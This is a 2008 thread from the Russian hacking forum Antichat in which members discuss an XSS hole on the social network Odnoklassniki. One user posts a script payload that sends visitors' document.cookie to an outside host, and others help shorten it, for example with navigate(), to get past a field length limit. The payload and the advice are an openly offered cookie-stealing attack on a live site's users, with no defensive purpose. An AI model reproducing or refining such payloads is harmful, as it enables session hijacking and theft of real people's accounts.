Форум АНТИЧАТ
Страница 1 из 4 1 2 3 4 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Итак наверно всем известно что на одноклассниках есть xss (https://forum.antichat.xyz/showthread.php?t=67287)

andrey_a87 14.04.2008 16:02
Итак наверно всем известно что на одноклассниках есть xss
 
но вот что делать если не помещается мой скрипт в отведенное мне поле?

~Real F@ck!~ 14.04.2008 16:04
мы экстрасенсы ? хсс в студию

andrey_a87 14.04.2008 16:12
<script>document.location='http://s.netsec.ru/andreya87.gif'+document.cookie</script>

~Real F@ck!~ 14.04.2008 16:15
Цитата:
http://s.netsec.ru/andreya87.gif
это как я понял твой скрипт, попробуй сделать переадресацию с другого сайта, что бы использовалось меньше символов в урл.

andrey_a87 14.04.2008 16:16
например? всё равно не уместится...

Qwazar 14.04.2008 16:21
А сколько символов ограничение? Вместо "document.location=", можно navigate('') попробовать. Короче получится.

andrey_a87 14.04.2008 16:27
умещается только <script>document.location='http://s.netsec.ru/andr

andrey_a87 14.04.2008 16:29
<script>navigate('http://s.netsec.ru/andreya87.gif и усё :cool:

~Real F@ck!~ 14.04.2008 16:30
как то можно обойти это ограничение, только я зобыл как, нужно кеша спросить

andrey_a87 14.04.2008 16:38
мммм жаль....


Время: 00:12
Страница 1 из 4 1 2 3 4 >
Показывать 40 сообщений этой темы на одной странице